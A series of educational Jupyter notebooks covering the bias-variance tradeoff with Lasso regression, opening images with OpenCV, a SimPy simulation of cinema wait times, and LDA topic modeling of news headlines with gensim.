+ \sum_{j=1}^{m} \theta_j x_{ij}}}) + (1-y_i)\ln(1-\frac{1}{1+e^{-\theta_0 + \sum_{j=1}^{m} \theta_j x_{ij}}}))] + \color{red}{\frac{\alpha}{m} \sum_{j=0}^{m} \theta_j^2}$ Let's translate these concepts to code in the next module! 
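Before moving on to Module 3, here is a quick numpy sanity check of the logloss clipping described above (a minimal sketch; the toy prediction vectors are made up):
```python
import numpy as np

# Minimal sketch of log loss with the clipping described above (eps = 1e-15 avoids log(0)).
def logloss(y_true, y_pred, eps=1e-15):
    y_pred = np.clip(y_pred, eps, 1 - eps)
    return -np.mean(y_true * np.log(y_pred) + (1 - y_true) * np.log(1 - y_pred))

y_true = np.array([0, 0, 1, 1])
print(logloss(y_true, np.array([0.0, 0.0, 1.0, 1.0])))   # confidently correct -> ~1e-15 (essentially 0)
print(logloss(y_true, np.array([1.0, 1.0, 0.0, 0.0])))   # confidently wrong  -> ~34.5
```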
Module 3: The bias-variance tradeoff Learning objectives of this module:- perform a simple train/validation/test split on IID data,- apply linear and logistic regression to datasets,- tune the regularization hyperparameter,- identify models with high bias and high variance,- select the best model and measure its performance on a previously unseen dataset, the test set.
###Code
# STEP 1: read in the data
# https://www4.stat.ncsu.edu/~boos/var.select/diabetes.html
# IID - independent and identically distributed dataset
import pandas as pd
df = pd.read_csv('https://www4.stat.ncsu.edu/~boos/var.select/diabetes.tab.txt',delimiter='\t')
print(df.head())
# separate out the feature matrix and the target variable
y = df.iloc[:,-1] # the last column is the target variable
X = df.iloc[:,:-1] # all but the last column are the features
print(y.head())
print(X.head())
# STEP 2: split the data
from sklearn.model_selection import train_test_split
X_other, X_test, y_other, y_test = train_test_split(X,y,test_size=0.2,random_state=1)
X_train, X_val, y_train, y_val = train_test_split(X_other,y_other,test_size=0.25,random_state=1)
# verify the results
print(X_train.shape) # 60% for training
print(X_val.shape) # 20% for validation
print(X_test.shape) # 20% for testing
# STEP 3: preprocess the data
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler() # initialize the scaler
X_train_prep = scaler.fit_transform(X_train)
X_val_prep = scaler.transform(X_val)
X_test_prep = scaler.transform(X_test)
# the _prep objects are now numpy arrays
# let's verify that all feature means are 0 and stds are 1
print(np.mean(X_train_prep,axis=0))
print(np.std(X_train_prep,axis=0))
print(np.mean(X_val_prep,axis=0)) # not exactly 0
print(np.std(X_val_prep,axis=0)) # not exactly 1
print(np.mean(X_test_prep,axis=0)) # not exactly 0
print(np.std(X_test_prep,axis=0)) # not exactly 1
# STEP 4:
# train linear regression models
# tune the regularization parameter
# calculate and visualize train and validation scores
# select the model that performs best on the validation set
# calculate the generalization error using the test set
import matplotlib.pyplot as plt
from sklearn.linear_model import Lasso
from sklearn.metrics import mean_squared_error
alphas = np.logspace(-2,2,13)
print(alphas)
train_scores = []
val_scores = []
models = []
for alpha in alphas:
# initialize the model
linreg = Lasso(alpha=alpha)
# fit it to the training set
linreg.fit(X_train_prep,y_train)
# save the model
models.append(linreg)
# calculate and save train score
y_train_pred = linreg.predict(X_train_prep)
train_score = mean_squared_error(y_train,y_train_pred,squared=False)
train_scores.append(train_score)
# calculate and save val score
y_val_pred = linreg.predict(X_val_prep)
val_score = mean_squared_error(y_val,y_val_pred,squared=False)
val_scores.append(val_score)
# let's visualize the train and validation scores
plt.plot(alphas,train_scores,label='train score')
plt.plot(alphas,val_scores,label='validation score')
plt.xlabel('regularization strength (alpha)',fontsize=13)
plt.ylabel('RMSE',fontsize=13)
plt.semilogx()
plt.legend(fontsize=13)
plt.savefig('figures/bias-variance.png',dpi=300)
plt.show()
###Output
[1.00000000e-02 2.15443469e-02 4.64158883e-02 1.00000000e-01
2.15443469e-01 4.64158883e-01 1.00000000e+00 2.15443469e+00
4.64158883e+00 1.00000000e+01 2.15443469e+01 4.64158883e+01
1.00000000e+02]
###Markdown
The bias-variance tradeoff- high alpha (strong regularization): - the model is too simple - it performs poorly on both the training and validation sets (RMSEs are large) - high bias or low variance model- low alpha (weak regularization) - the model is too complex - it performs very well on the training set but it performs comparatively poorly on the validation set - low bias or high variance model- we are looking for the sweet spot in between - if your evaluation metric needs to be minimized (e.g., MSE, RMSE, logloss) - select the alpha with the smallest validation score - the corresponding model is the best - if your evaluation metric needs to be maximized (e.g., accuracy, R2) - select the alpha with the largest validation score - the corresponding model is the best Let's select the best model and calculate the generalization error
###Code
indx = np.argmin(val_scores)
print('best alpha:',alphas[indx]) # the best alpha value
print('best validation score:',val_scores[indx]) # the validation score
final_model = models[indx] # pull out the best model
y_test_pred = final_model.predict(X_test_prep)
gen_error = mean_squared_error(y_test,y_test_pred,squared=False)
print('the generalization error:',gen_error) # the error we expect from the model on previously unseen data
###Output
best alpha: 2.154434690031882
best validation score: 57.4873819354221
the generalization error: 54.72060685174691
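###Markdown
The selection above used RMSE, a "smaller is better" metric, so we took the argmin of the validation scores. If we had optimized a "larger is better" metric such as R2 instead, we would pick the alpha with the largest validation score; a small sketch of that branch is shown below, reusing the `models`, `alphas`, `X_val_prep` and `y_val` objects defined earlier:
###Code
import numpy as np
from sklearn.metrics import r2_score

# score every saved model on the validation set with R2 and pick the LARGEST value
val_r2_scores = [r2_score(y_val, m.predict(X_val_prep)) for m in models]
best_indx = int(np.argmax(val_r2_scores))
print('best alpha according to R2:', alphas[best_indx])
print('best validation R2:', val_r2_scores[best_indx])
###Output
_____no_output_____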
|
00_Introduction_OpenDisplayImages.ipynb | ###Markdown
*This notebook is a part of a series, [Learning image manipulation in Python](find), that covers the basics of working with images in [OpenCV](https://docs.opencv.org/), [Matplotlib](https://matplotlib.org/users/index.html) and [Numpy](https://numpy.org/doc/).* Introduction: Opening and displaying images Installing libraries We will primarily be working with OpenCV (cv2) for image handling. OpenCV can be installed in Anaconda from here: https://anaconda.org/conda-forge/opencv `conda install -c conda-forge opencv`
###Code
from matplotlib import pyplot as plt
import cv2
print( cv2.__version__)
###Output
3.4.2
###Markdown
Loading imagesYou can use `cv2.imread()` to load an image file.
###Code
image = cv2.imread("images/rgb.jpg")
# Remember shape returns a tuple with the number of rows (height) first
height, width, channels = image.shape
print('%d high by %d wide with %d channels' % (height, width, channels))
###Output
512 high by 512 wide and 3 channels
###Markdown
Displaying imagesYou can use `matplotlib.pyplot` (referenced here as `plt`) to display the image. Note that cv2 orders the color channels blue, green then red and matplotlib uses red, green then blue. To address this you can use `cv2.cvtColor()` to change the order before display. You can use `axis()` and `title()` methods of pyplot to adjust the appearance.
###Code
imageRGB = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Display original image using matplotlib
plt.imshow(image)
plt.axis('off')
plt.title('Incorrect (BGR image)')
plt.show()
# Display converted image using matplotlib
plt.imshow(imageRGB)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
_____no_output_____
###Markdown
Loading images from URLThe OpenCV `cv2.imread()` method is not able to read directly from a URL, but the scikit-image (skimage) library's `io.imread()` method is. This method loads an image in RGB channel order, so no conversion is needed.
###Code
from skimage import io
url = 'https://github.com/Algorithmic-Lens/Learning-image-manipulation-in-Python/raw/master/images/rgb.jpg'
remoteImage = io.imread(url)
# Display image using matplotlib
plt.imshow(remoteImage)
plt.axis('off')
plt.title('Correct (RGB image)')
plt.show()
###Output
512 by 512 pixels and 3 channels
|
src/simpy/cinema_example (realpython).ipynb | ###Markdown
Table of ContentsExample - Cinema SimulationDefine the problemBrainstorm the algorithmDefine librariesCode: class definitionDefine the functionRun the simulation Example - Cinema SimulationSimulating Real-World Processes in Python with SimPy. Work through another example of using SimPy from [realpython.com](https://realpython.com/simpy-simulating-with-python/) Define the problemThe first step of running a simulation is to choose a process to model. In this example, we will imagine we are consulting for a small cinema chain, which has bad reviews due to long waiting times. The company has done some research, and found out that the average customer is willing to wait for at most **10 minutes** between arriving at the venue and being seated. Therefore, the problem has been formulated as helping to **get wait times below 10 minutes**. Brainstorm the algorithmBefore approaching the problem from a coding perspective, first work out how the process will work in real life. This will ensure that the code is an accurate reflection of what happens in real life. First, list the possible steps someone who visits the cinema would face.Steps on entering a cinema:1. **Arrive** at venue2. **Queue** to buy ticket3. **Buy** ticket4. **Queue** to get ticket checked 5. **Get** ticket checked6. **Decide** whether to get drinks/food: - If yes, **purchase drinks/food** - If no, go to the last step7. **Go** directly to the seatNow we have defined the steps above, we can see which parts of the process can be controlled by the cinema chain itself. An example would be how long a customer waits before buying their ticket or drinks/food, and this can be controlled by the number of staff serving these customers.There are parts of the process that cannot be controlled, such as when the customers are arriving at the venue, or in what volume they will arrive. Since we cannot accurately guess this number, this parameter will have to be filled with available data to determine an appropriate arrival time.
###Code
import random
import statistics
import simpy
print(simpy.__version__)
###Output
4.0.1
###Markdown
The goal is to find the optimal number of employees giving an average wait time of **less than 10 minutes**. To define and solve this problem, we will collect a list of waiting times for each customer, from when they enter the venue to when they sit down.
###Code
waiting_times = []
###Output
_____no_output_____
###Markdown
Code: class definition Build the blueprint for the system: the environment in which the events will happen, such as people moving from one place to another. The class is named `Cinema`, and it is given the SimPy environment when it is created.
###Code
class Cinema(object):
def __init__(self, env):
self.env = env
###Output
_____no_output_____
###Markdown
Consider what might be in the Cinema to add to the simulation. As outlined in the steps above, there will be staff to sell tickets and refreshments (drinks/food). From the cinema's perspective, the staff are therefore a **resource** who assist the customers in **purchasing items**. We frame the problem as: how does the waiting time change depending on the number of staff available in each simulation? So, the next variable to declare in the class is `num_staff`, which is vital to the resulting waiting time.
###Code
class Cinema(object):
def __init__(self, env, num_staff):
self.env = env
self.staff = simpy.Resource(env, num_staff)
###Output
_____no_output_____
###Markdown
We know that purchasing a ticket is going to take a certain amount of time, so either use historical data for this, or provide an estimate for this process time. This time can be a range, since the size of the party could be different. In this example we will estimate that it takes between 1 and 3 minutes to buy a ticket.We will use the `timeout` method from SimPy to mimic this behaviour.
###Code
class Cinema(object):
def __init__(self, env, num_staff):
self.env = env
self.staff = simpy.Resource(env, num_staff)
# customer must be passed as a parameter, since they cause the event to occur.
def purchase_ticket(self, customer):
yield self.env.timeout(random.randint(1,3))
###Output
_____no_output_____
###Markdown
Declare two more resources: - Staff to check tickets - Staff to serve food/drinksThese two tasks take a different amount of time, so as before either use historical data, or provide a best guess.
###Code
class Cinema(object):
def __init__(self, env, num_staff, num_checkers, num_servers):
self.env = env
self.staff = simpy.Resource(env, num_staff)
# ticket checker
self.checker = simpy.Resource(env, num_checkers)
# food/drinks server
self.server = simpy.Resource(env, num_servers)
# customer must be passed as a parameter, since they cause the event to occur.
def purchase_ticket(self, customer):
# process of a customer buying a ticket
yield self.env.timeout(random.randint(1, 3))
def check_ticket(self, customer):
# process of a member of staff checking a ticket
# this is defined as 3 seconds, don't need a random number
yield self.env.timeout(3/60)
def sell_food(self, customer):
# process of staff selling food
yield self.env.timeout(random.randint(1, 5))
###Output
_____no_output_____
###Markdown
Define the functionThe environment has been set up by the class above, with the resources and processes defined. All that is left is for a customer to enter the process. In process terms, they will:- arrive at the venue- request a resource- wait for the process to complete- leave. Create a function to simulate this process
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# variable customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
###Output
_____no_output_____
###Markdown
Each of the processes from the Cinema should have corresponding requests in `go_to_cinema()`.The first process in the class is `purchase_ticket()`, using a `staff` resource. Below is a summary of the processes in the `cinema`, and the request made in the `go_to_cinema` method. | Process in cinema | Request in `go_to_cinema()`|| ------------- |:-------------:| | `purchase_ticket()` | request a member of `staff` | | `check_ticket()` | request a `checker`| | `sell_food()` | request a `server`| A member of `staff` is a shared resource in the process, so a customer can use the same member of staff, but this member of staff can only help one customer at a time. This needs to be accounted for.
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# variable customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
###Output
_____no_output_____
###Markdown
For the above, we see:- `cinema.staff.request()`: the customer causes a request to call a member of staff, using a `staff` resource- `yield request`: customer waits for a `staff` to become available if all are currently in use- `yield env.process()`: the customer uses an available member of `staff` to complete the given process, in this case to purchase the ticket using the class method `cinema.purchase_ticket()`. Once the member of staff is then freed up, the `customer` will spend time buying their ticket. `env.process()` tells the simulation to go to the `Cinema` instance and run the `purchase_ticket()` process on the `customer`.The customer will repeat the **request, use, release** cycle to get their ticket checked.
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# variable customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
with cinema.checker.request() as request:
yield request
yield env.process(cinema.check_ticket(customer))
###Output
_____no_output_____
###Markdown
The next part is to add the optional step of buying food/drinks, which is quite random, and we can add the randomness to the function
###Code
def go_to_cinema(env, customer, cinema):
# customer will be controlled by the environment, so passed into first param
# variable customer tracks each person moving through the system
# final parameter allows us to access the processes defined in the Cinema class
# define the arrival time as a store to see when the customers arrive
arrival_time = env.now
with cinema.staff.request() as request:
yield request
yield env.process(cinema.purchase_ticket(customer))
with cinema.checker.request() as request:
yield request
yield env.process(cinema.check_ticket(customer))
if random.choice([True, False]):
# here the outcome could either be that they go and buy food,
# or they simply go straight to their seat
with cinema.staff.request() as request:
yield request
yield env.process(cinema.sell_food(customer))
waiting_times.append(env.now - arrival_time)
###Output
_____no_output_____
###Markdown
Here, `env.now` will give the time at which the customer has finished all the processes and made it to their seat, so we add the overall time to the `waiting_times` list. Define a function to run the simulation, `run_cinema()` is responsible for creating an instance of the cinema, and generating customers until the simulation stops.We start the simulation with a few customers waiting at the cinema, as they might be there as soon as the box office opens. Then, customers will arrive in a certain timeframe, which we can guess will be on average every 12 seconds, so we will tell the function to wait this long before generating a new customer.
###Code
def run_cinema(env, num_staff, num_checkers, num_servers):
cinema = Cinema(env, num_staff, num_checkers, num_servers)
for customer in range(3):
# this will tell the simulation to move the customers through the cinema
env.process(go_to_cinema(env, customer, cinema))
while True:
yield env.timeout(0.2) # waiting time before a new customer comes
# increment the customer by 1, and generate the next person
customer += 1
env.process(go_to_cinema(env, customer, cinema))
###Output
_____no_output_____
###Markdown
To calculate the wait time, we have a list of waiting times (time taken for each customer to make it to their seat) `waiting_times`. Take the average to get the average wait time.Define a function to do this
###Code
def calculate_wait_time(waiting_times):
average_wait = statistics.mean(waiting_times)
# pretty print results
minutes, frac_mins = divmod(average_wait, 1)
seconds = frac_mins * 60
return round(minutes), round(seconds)
###Output
_____no_output_____
###Markdown
Specify a user input function to define the number of staff that will be working, in the roles of staff (`num_staff`), checkers (`num_checkers`) and servers (`num_servers`). We would like to change the above variables to see how the simulation changes. If a popular film has many customers lining up outside, how many people should be in the staff to sell the tickets? Will there be big queues of people waiting for food/drink? What value for `num_servers` will help ease the flow? Create a helper function for the user to change the values of the above parameters to try different scenarios.
###Code
def get_user_input():
num_staff = input("Input # staff working:")
num_checkers = input("Input # checkers working:")
num_servers = input("Input # servers working:")
params = [num_staff, num_checkers, num_servers]
if all(str(i).isdigit() for i in params):
params = [int(x) for x in params]
else:
print("Couldn't parse input. Simulation will use default values of \n"
"1 for staff, checker and server")
params = [1, 1, 1]
return params
###Output
_____no_output_____
###Markdown
Now we will create the final function, `main()`, which ensures the script runs in proper order when you execute it in the command line.
###Code
def main():
random.seed(42)
num_staff, num_checkers, num_servers = get_user_input()
env = simpy.Environment()
env.process(run_cinema(env, num_staff, num_checkers, num_servers))
env.run(until=90)
# print(waiting_times)
mins, secs = calculate_wait_time(waiting_times)
print(f"Running simulation... \n"
f"The average wait time is {mins} minutes and {secs} seconds")
###Output
_____no_output_____
###Markdown
Let's look at an overview of all of the functions and classes we have:- `Cinema`: class and blueprint for the environment to simulate. Contains information such as what resources are available, and what the processes are- `go_to_cinema`: this function makes a request to use a resource, goes through the full process, and then releases it for the next customer- `run_cinema`: this controls the simulation. It uses the `Cinema` class blueprint to create an instance of the cinema, and then calls `go_to_cinema` to generate and move people through the cinema- `calculate_wait_time`: finds the average time it takes someone to get through the cinema and formats it so the final output is easy to read- `get_user_input`: reads the number of staff, checkers and servers to simulate- `main`: ties everything together and prints the result. Run the simulationNow let's run the simulation by inputting the values requested. Running it with different values, we can see how the wait time can be reduced.
###Code
main()
main()
main()
main()
main()
main()
###Output
Input # staff working:30
Input # checkers working:10
Input # servers working:20
Running simulation...
The average wait time is 12 minutes and 58 seconds
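###Markdown
The runs above rely on interactive `input()` calls. For quick experimentation it can also be useful to sweep a few staffing levels programmatically; the snippet below is a small sketch of that idea, reusing `run_cinema()` and `calculate_wait_time()` from the cells above with hard-coded (made up) staffing values and clearing the shared `waiting_times` list between runs:
###Code
import random
import simpy

# assumes Cinema, go_to_cinema, run_cinema, calculate_wait_time and the
# waiting_times list from the cells above are already defined in this notebook
for num_staff, num_checkers, num_servers in [(1, 1, 1), (5, 2, 3), (10, 5, 6)]:
    waiting_times.clear()   # reset the shared results list between runs
    random.seed(42)         # same arrival randomness for a fair comparison
    env = simpy.Environment()
    env.process(run_cinema(env, num_staff, num_checkers, num_servers))
    env.run(until=90)       # simulate 90 minutes, as in main()
    mins, secs = calculate_wait_time(waiting_times)
    print(f"staff={num_staff}, checkers={num_checkers}, servers={num_servers}:"
          f" average wait {mins} min {secs} s")
###Output
_____no_output_____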
|
Exercises/topic-modeling/Latent_dirichlet_allocation.ipynb | ###Markdown
Step 0: Latent Dirichlet Allocation LDA is used to classify text in a document to a particular topic. It builds a topic per document model and words per topic model, modeled as Dirichlet distributions. * Each document is modeled as a multinomial distribution of topics and each topic is modeled as a multinomial distribution of words.* LDA assumes that every chunk of text we feed into it will contain words that are somehow related. Therefore choosing the right corpus of data is crucial. * It also assumes documents are produced from a mixture of topics. Those topics then generate words based on their probability distribution (a tiny sketch of this generative process is shown just before we load the data below). Step 1: Load the datasetThe dataset we'll use is a list of over one million news headlines published over a period of 15 years. We'll start by loading it from the `abcnews-date-text.csv` file.
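Before we do, here is a tiny sketch of the generative story from Step 0 (the toy vocabulary, sizes and priors are made up; it only assumes numpy): each document draws a topic mixture from a Dirichlet, each topic draws a word distribution from a Dirichlet, and words are then sampled topic by topic.
###Code
import numpy as np

rng = np.random.default_rng(0)
vocab = ['rain', 'drought', 'water', 'court', 'charge', 'polic']  # toy vocabulary
n_topics, doc_length, alpha, eta = 2, 8, 0.5, 0.5                 # made-up sizes and priors

topic_word = rng.dirichlet([eta] * len(vocab), size=n_topics)  # word distribution per topic
doc_topics = rng.dirichlet([alpha] * n_topics)                 # topic mixture for one document

words = []
for _ in range(doc_length):
    z = rng.choice(n_topics, p=doc_topics)                          # pick a topic for this slot
    words.append(vocab[rng.choice(len(vocab), p=topic_word[z])])    # pick a word from that topic
print(doc_topics)
print(' '.join(words))
###Output
_____no_output_____
###Markdown
With that toy picture in mind, let's load the real headlines.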
###Code
'''
Load the dataset from the CSV and save it to 'data_text'
'''
import pandas as pd
data = pd.read_csv('abcnews-date-text.csv', error_bad_lines=False);
# We only need the Headlines text column from the data
data_text = data[:300000][['headline_text']];
data_text['index'] = data_text.index
documents = data_text
###Output
_____no_output_____
###Markdown
Let's glance at the dataset:
###Code
'''
Get the total number of documents
'''
print(len(documents))
documents[:5]
###Output
_____no_output_____
###Markdown
Step 2: Data Preprocessing We will perform the following steps:* **Tokenization**: Split the text into sentences and the sentences into words. Lowercase the words and remove punctuation.* Words that have fewer than 3 characters are removed.* All **stopwords** are removed.* Words are **lemmatized** - words in third person are changed to first person and verbs in past and future tenses are changed into present.* Words are **stemmed** - words are reduced to their root form.
###Code
'''
Loading Gensim and nltk libraries
'''
# pip install gensim
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
np.random.seed(400)
import nltk
nltk.download('wordnet')
###Output
[nltk_data] Downloading package wordnet to /root/nltk_data...
[nltk_data] Unzipping corpora/wordnet.zip.
###Markdown
Lemmatizer ExampleBefore preprocessing our dataset, let's first look at a lemmatizing example. What would be the output if we lemmatized the word 'went':
###Code
print(WordNetLemmatizer().lemmatize('went', pos = 'v')) # past tense to present tense
###Output
go
###Markdown
Stemmer ExampleLet's also look at a stemming example. Let's throw a number of words at the stemmer and see how it deals with each one:
###Code
stemmer = SnowballStemmer("english")
original_words = ['caresses', 'flies', 'dies', 'mules', 'denied','died', 'agreed', 'owned',
'humbled', 'sized','meeting', 'stating', 'siezing', 'itemization','sensational',
'traditional', 'reference', 'colonizer','plotted']
singles = [stemmer.stem(plural) for plural in original_words]
pd.DataFrame(data={'original word':original_words, 'stemmed':singles })
'''
Write a function to perform the pre processing steps on the entire dataset
'''
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
# Tokenize and lemmatize
def preprocess(text):
#result=[]
#for token in gensim.utils.simple_preprocess(text) :
# if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
# TODO: Apply lemmatize_stemming() on the token, then add to the results list
# result.append(lemmatize_stemming(token))
result = [ lemmatize_stemming(token)
for token in gensim.utils.simple_preprocess(text)
if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3 ]
return result
'''
Preview a document after preprocessing
'''
document_num = 4310
doc_sample = documents[documents['index'] == document_num].values[0][0]
print("Original document: ")
words = []
for word in doc_sample.split(' '):
words.append(word)
print(words)
print("\n\nTokenized and lemmatized document: ")
print(preprocess(doc_sample))
documents
###Output
_____no_output_____
###Markdown
Let's now preprocess all the news headlines we have. To do that, let's use the [map](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.map.html) function from pandas to apply `preprocess()` to the `headline_text` column. **Note**: This may take a few minutes (it takes about 6 minutes on my laptop)
###Code
# TODO: preprocess all the headlines, saving the list of results as 'processed_docs'
processed_docs = documents['headline_text'].map(lambda headline: preprocess(headline))
'''
Preview 'processed_docs'
'''
processed_docs[:10]
###Output
_____no_output_____
###Markdown
Step 3.1: Bag of words on the datasetNow let's create a dictionary from 'processed_docs' containing the number of times a word appears in the training set. To do that, let's pass `processed_docs` to [`gensim.corpora.Dictionary()`](https://radimrehurek.com/gensim/corpora/dictionary.html) and call it '`dictionary`'.
###Code
'''
Create a dictionary from 'processed_docs' containing the number of times a word appears
in the training set using gensim.corpora.Dictionary and call it 'dictionary'
'''
dictionary = gensim.corpora.Dictionary(processed_docs)
'''
Checking dictionary created
'''
count = 0
for k, v in dictionary.iteritems():
print(k, v)
count += 1
if count > 10:
break
###Output
0 broadcast
1 communiti
2 decid
3 licenc
4 awar
5 defam
6 wit
7 call
8 infrastructur
9 protect
10 summit
###Markdown
** Gensim filter_extremes **[`filter_extremes(no_below=5, no_above=0.5, keep_n=100000)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.filter_extremes)Filter out tokens that appear in* less than no_below documents (absolute number) or* more than no_above documents (fraction of total corpus size, not absolute number).* after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
###Code
'''
OPTIONAL STEP
Remove very rare and very common words:
- words appearing less than 15 times
- words appearing in more than 10% of all documents
'''
# TODO: apply dictionary.filter_extremes() with the parameters mentioned above
dictionary.filter_extremes(no_below=15, no_above=0.1)
dictionary.token2id
###Output
_____no_output_____
###Markdown
** Gensim doc2bow **[`doc2bow(document)`](https://radimrehurek.com/gensim/corpora/dictionary.htmlgensim.corpora.dictionary.Dictionary.doc2bow)* Convert document (a list of words) into the bag-of-words format = list of (token_id, token_count) 2-tuples. Each word is assumed to be a tokenized and normalized string (either unicode or utf8-encoded). No further preprocessing is done on the words in document; apply tokenization, stemming etc. before calling this method.
###Code
'''
Create the Bag-of-words model for each document i.e for each document we create a dictionary reporting how many
words and how many times those words appear. Save this to 'bow_corpus'
'''
# TODO
bow_corpus = list( map(lambda doc: dictionary.doc2bow(doc), processed_docs))
#bow_corpus = [dictionary.doc2bow(doc) for doc in processed_docs]
'''
Checking Bag of Words corpus for our sample document --> (token_id, token_count)
'''
print(processed_docs[document_num])
bow_corpus[document_num]
'''
Preview BOW for our sample preprocessed document
'''
# Here document_num is document number 4310 which we have checked in Step 2
bow_doc_4310 = bow_corpus[document_num]
for i in range(len(bow_doc_4310)):
print("Word {} (\"{}\") appears {} time.".format(bow_doc_4310[i][0],
dictionary[bow_doc_4310[i][0]],
bow_doc_4310[i][1]))
###Output
Word 71 ("bushfir") appears 1 time.
Word 107 ("help") appears 1 time.
Word 462 ("rain") appears 1 time.
Word 3530 ("dampen") appears 1 time.
###Markdown
Step 3.2: TF-IDF on our document set While performing TF-IDF on the corpus is not necessary for LDA implementation using the gensim model, it is recommended. TF-IDF expects a bag-of-words (integer values) training corpus during initialization. During transformation, it will take a vector and return another vector of the same dimensionality.*Please note: The author of Gensim dictates the standard procedure for LDA to be using the Bag of Words model.* ** TF-IDF stands for "Term Frequency, Inverse Document Frequency".*** It is a way to score the importance of words (or "terms") in a document based on how frequently they appear across multiple documents.* If a word appears frequently in a document, it's important. Give the word a high score. But if a word appears in many documents, it's not a unique identifier. Give the word a low score.* Therefore, common words like "the" and "for", which appear in many documents, will be scaled down. Words that appear frequently in a single document will be scaled up.In other words:* TF(w) = `(Number of times term w appears in a document) / (Total number of terms in the document)`.* IDF(w) = `log(Total number of documents / Number of documents with term w in it)` (the base of the logarithm only rescales every score by a constant factor; the example below uses base 10).** For example *** Consider a document containing `100` words wherein the word 'tiger' appears 3 times. * The term frequency (i.e., tf) for 'tiger' is then: - `TF = (3 / 100) = 0.03`. * Now, assume we have `10 million` documents and the word 'tiger' appears in `1000` of these. Then, the inverse document frequency (i.e., idf) is calculated as: - `IDF = log10(10,000,000 / 1,000) = 4`. * Thus, the TF-IDF weight is the product of these quantities: - `TF-IDF = 0.03 * 4 = 0.12`.
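As a quick check of the arithmetic in the example above, here is a tiny sketch in plain Python (the counts are the hypothetical ones from the example, not from our corpus):
###Code
import math

term_count, doc_length = 3, 100            # 'tiger' appears 3 times in a 100-word document
n_docs, docs_with_term = 10000000, 1000    # corpus-level counts from the example
tf = term_count / doc_length               # 0.03
idf = math.log10(n_docs / docs_with_term)  # 4.0 with the base-10 log used in the example
print(tf, idf, tf * idf)                   # 0.03 4.0 0.12
###Output
_____no_output_____
###Markdown
Gensim's `TfidfModel` computes a variant of these weights for every token and, by default, also normalizes each document vector; that is what we build next.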
###Code
'''
Create tf-idf model object using models.TfidfModel on 'bow_corpus' and save it to 'tfidf'
'''
from gensim import corpora, models
# TODO
tfidf = models.TfidfModel(bow_corpus) # fit a model
tfidf
'''
Apply transformation to the entire corpus and call it 'corpus_tfidf'
'''
# TODO
corpus_tfidf = tfidf[bow_corpus] # apply model to bow_corpus
corpus_tfidf
'''
Preview TF-IDF scores for our first document --> --> (token_id, tfidf score)
'''
from pprint import pprint
for doc in corpus_tfidf:
pprint(doc)
break
###Output
[(0, 0.5959813347777092),
(1, 0.39204529549491984),
(2, 0.48531419274988147),
(3, 0.50554610985785686)]
###Markdown
Step 4.1: Running LDA using Bag of Words We are going for 10 topics in the document corpus.** We will be running LDA using all CPU cores to parallelize and speed up model training.**Some of the parameters we will be tweaking are:* **num_topics** is the number of requested latent topics to be extracted from the training corpus.* **id2word** is a mapping from word ids (integers) to words (strings). It is used to determine the vocabulary size, as well as for debugging and topic printing.* **workers** is the number of extra processes to use for parallelization. Uses all available cores by default.* **alpha** and **eta** are hyperparameters that affect sparsity of the document-topic (theta) and topic-word (lambda) distributions. We will let these be the default values for now(default value is `1/num_topics`) - Alpha is the per document topic distribution. * High alpha: Every document has a mixture of all topics(documents appear similar to each other). * Low alpha: Every document has a mixture of very few topics - Eta is the per topic word distribution. * High eta: Each topic has a mixture of most words(topics appear similar to each other). * Low eta: Each topic has a mixture of few words.* ** passes ** is the number of training passes through the corpus. For example, if the training corpus has 50,000 documents, chunksize is 10,000, passes is 2, then online training is done in 10 updates: * `1 documents 0-9,999 ` * `2 documents 10,000-19,999 ` * `3 documents 20,000-29,999 ` * `4 documents 30,000-39,999 ` * `5 documents 40,000-49,999 ` * `6 documents 0-9,999 ` * `7 documents 10,000-19,999 ` * `8 documents 20,000-29,999 ` * `9 documents 30,000-39,999 ` * `10 documents 40,000-49,999`
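For reference, the knobs discussed above map directly onto `LdaMulticore` keyword arguments; the commented sketch below shows how they could be passed explicitly (the prior values are made up, and the call is left commented out because it would train a separate model for several minutes).
###Code
# Illustrative sketch only (made-up prior values): the hyperparameters discussed
# above map onto LdaMulticore keyword arguments like this. Uncomment to try it.
# demo_lda = gensim.models.LdaMulticore(bow_corpus,
#                                       num_topics=10,
#                                       id2word=dictionary,
#                                       chunksize=10000,   # documents per update, as in the example
#                                       passes=2,          # full passes over the corpus
#                                       workers=2,         # extra worker processes
#                                       alpha=[0.1] * 10,  # per-document topic prior (one value per topic)
#                                       eta=0.01)          # per-topic word prior
###Output
_____no_output_____
###Markdown
In the next cell we train the model with the default priors and the settings described above.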
###Code
# LDA mono-core -- fallback code in case LdaMulticore throws an error on your machine
# lda_model = gensim.models.LdaModel(bow_corpus,
# num_topics = 10,
# id2word = dictionary,
# passes = 50)
# LDA multicore
'''
Train your lda model using gensim.models.LdaMulticore and save it to 'lda_model'
'''
# TODO
lda_model = gensim.models.LdaMulticore(bow_corpus,
num_topics = 10,
id2word = dictionary,
passes = 2,
workers = 2)
'''
For each topic, we will explore the words occuring in that topic and its relative weight
'''
for idx, topic in lda_model.print_topics(-1):
print("Topic: {} \nWords: {}".format(topic, idx ))
print("\n")
###Output
